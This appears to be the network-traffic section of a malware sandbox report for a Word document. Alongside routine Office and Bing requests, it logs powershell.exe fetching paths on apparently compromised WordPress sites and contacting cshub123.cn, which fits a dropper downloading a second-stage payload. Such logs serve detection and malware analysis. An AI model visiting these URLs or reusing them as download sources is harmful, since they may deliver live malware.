    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 2591108
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: vrEqBGTQlsozuupDUs6ADw==
    Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
    ETag: 0x8D60DDBDA502B66
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8dbaa68b-901e-00e1-2b97-a0566f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:16 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 261258
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
    Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
    ETag: 0x8D60DDC968C4F0E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: bb8fd03d-a01e-0043-4797-a06c76000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:12 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 550906
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
    Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
    ETag: 0x8D60DDC2BE7DF3C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a2e8f81c-101e-0034-3f97-a0b9e2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 640684
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
    Last-Modified: Wed, 29 Aug 2018 18:15:11 GMT
    ETag: 0x8D60DDB5C4DB3A1
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 02f02c12-801e-0026-1997-a0c232000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1065873
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
    Last-Modified: Wed, 29 Aug 2018 18:15:36 GMT
    ETag: 0x8D60DDB6B23796A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: ff55c06c-c01e-0039-5b97-a078cd000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 222992
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
    Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
    ETag: 0x8D60DDC26100537
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6340fd72-201e-0152-6397-a008cf000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1881952
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
    Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
    ETag: 0x8D60DDC0007D57D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 380b83a1-d01e-0040-6a97-a01187000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1310275
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
    Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
    ETag: 0x8D60DDBA6587FB6
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: e4f0118c-501e-0148-3a97-a06910000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 2527736
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8laspQm0xsAUTSeMcDawqA==
    Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
    ETag: 0x8D60DDBDD02F94A
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 73ebaaec-101e-0024-1d97-a07c8a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: F4A31300-75CB-4544-8BD1-8BC58DF32373
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 953453
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 1OrACenntkuLABroK4EC+g==
    Last-Modified: Thu, 12 Jul 2018 00:20:09 GMT
    ETag: 0x8D5E78D3A5A7B12
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 999a087b-601e-0095-5897-a0595a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sat, 25 May 2024 09:04:13 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    DNS
    162.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    162.61.62.23.in-addr.arpa
    IN PTR
    Response
    162.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-162deploystaticakamaitechnologiescom
  • flag-us
    DNS
    23.251.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.251.17.2.in-addr.arpa
    IN PTR
    Response
    23.251.17.2.in-addr.arpa
    IN PTR
    a2-17-251-23deploystaticakamaitechnologiescom
  • flag-us
    DNS
    viettellogistics.com.vn
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    viettellogistics.com.vn
    IN A
    Response
    viettellogistics.com.vn
    IN A
    171.244.51.31
  • flag-vn
    GET
    https://viettellogistics.com.vn/wp-content/oS4/
    powershell.exe
    Remote address:
    171.244.51.31:443
    Request
    GET /wp-content/oS4/ HTTP/1.1
    Host: viettellogistics.com.vn
    Connection: Keep-Alive
    Response
    HTTP/1.1 308 Permanent Redirect
    date: Sat, 25 May 2024 09:04:20 GMT
    transfer-encoding: chunked
    location: /wp-content/oS4
    refresh: 0;url=/wp-content/oS4
    strict-transport-security: max-age=15724800; includeSubDomains
    set-cookie: SERVERID=A; path=/
    connection: close
  • flag-us
    DNS
    31.51.244.171.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    31.51.244.171.in-addr.arpa
    IN PTR
    Response
    31.51.244.171.in-addr.arpa
    IN CNAME
    31.0-24.51.244.171.in-addr.arpa
  • flag-us
    DNS
    cococat.se
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    cococat.se
    IN A
    Response
    cococat.se
    IN A
    185.189.51.191
  • flag-se
    GET
    http://cococat.se/wp-admin/2Oaf/
    powershell.exe
    Remote address:
    185.189.51.191:80
    Request
    GET /wp-admin/2Oaf/ HTTP/1.1
    Host: cococat.se
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Sat, 25 May 2024 09:04:22 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: keep-alive
    X-Powered-By: PHP/8.1.28
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Location: https://cococat.se
    Vary: User-Agent
  • flag-us
    DNS
    191.51.189.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    191.51.189.185.in-addr.arpa
    IN PTR
    Response
    191.51.189.185.in-addr.arpa
    IN PTR
    ns12inleednet
  • flag-us
    DNS
    andresirjan.ir
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    andresirjan.ir
    IN A
    Response
    andresirjan.ir
    IN A
    89.42.208.212
  • flag-ir
    GET
    http://andresirjan.ir/wp-admin/JSH/
    powershell.exe
    Remote address:
    89.42.208.212:80
    Request
    GET /wp-admin/JSH/ HTTP/1.1
    Host: andresirjan.ir
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    content-type: text/html; charset=UTF-8
    link: <http://andresirjan.ir/wp-json/>; rel="https://api.w.org/"
    transfer-encoding: chunked
    date: Sat, 25 May 2024 09:04:27 GMT
    server: LiteSpeed
  • flag-us
    DNS
    212.208.42.89.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.208.42.89.in-addr.arpa
    IN PTR
    Response
    212.208.42.89.in-addr.arpa
    IN PTR
    cp58mihanme
  • flag-us
    DNS
    103.169.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.169.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    sptrade.com.br
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    sptrade.com.br
    IN A
    Response
    sptrade.com.br
    IN A
    185.239.210.245
  • flag-us
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    245.210.239.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    245.210.239.185.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    91.90.14.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    91.90.14.23.in-addr.arpa
    IN PTR
    Response
    91.90.14.23.in-addr.arpa
    IN PTR
    a23-14-90-91deploystaticakamaitechnologiescom
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 415458
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F42F1CE650554D8C94501DEDEC34B12D Ref B: LON04EDGE0622 Ref C: 2024-05-25T09:05:39Z
    date: Sat, 25 May 2024 09:05:39 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 792794
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F392B688CE6447C8971DB92620A24C50 Ref B: LON04EDGE0622 Ref C: 2024-05-25T09:05:39Z
    date: Sat, 25 May 2024 09:05:39 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 627437
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 8ECFE39FB26F46D5B4B505891276927C Ref B: LON04EDGE0622 Ref C: 2024-05-25T09:05:39Z
    date: Sat, 25 May 2024 09:05:39 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 430689
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: A81C356F10194BE9836D100B07D79FB8 Ref B: LON04EDGE0622 Ref C: 2024-05-25T09:05:39Z
    date: Sat, 25 May 2024 09:05:39 GMT
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001a-msedgenet
  • 52.109.76.243:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    WINWORD.EXE
    1.7kB
    7.7kB
    11
    10

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 216.152.233.103:443
    cshub123.cn
    powershell.exe
    260 B
    5
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55
    tls, http2
    2.5kB
    9.0kB
    19
    17

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8bxpffpy6Zp9jxlVY79MSwTVUCUwWnaO2_USypv0wR-U-ZOqDRUayShnatE7mK_F6xlLTkPIHy7bwspOIwhgonGAdzhh9wZrp-1AfZHLrdkZVo_oGzqWLYPvzpPY0XwIqpJJnbFX372cE-X5pDRUdBQsSBP9FQDM9BMFfHsG1l8y2LrU5%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Dd895e4761d7014c66b98825dac2e0c60&TIME=20240426T135156Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:DA7A91E1-7E56-FC56-DF5D-E341A69C2E55&deviceId=6966564702298189&muid=DA7A91E17E56FC56DF5DE341A69C2E55

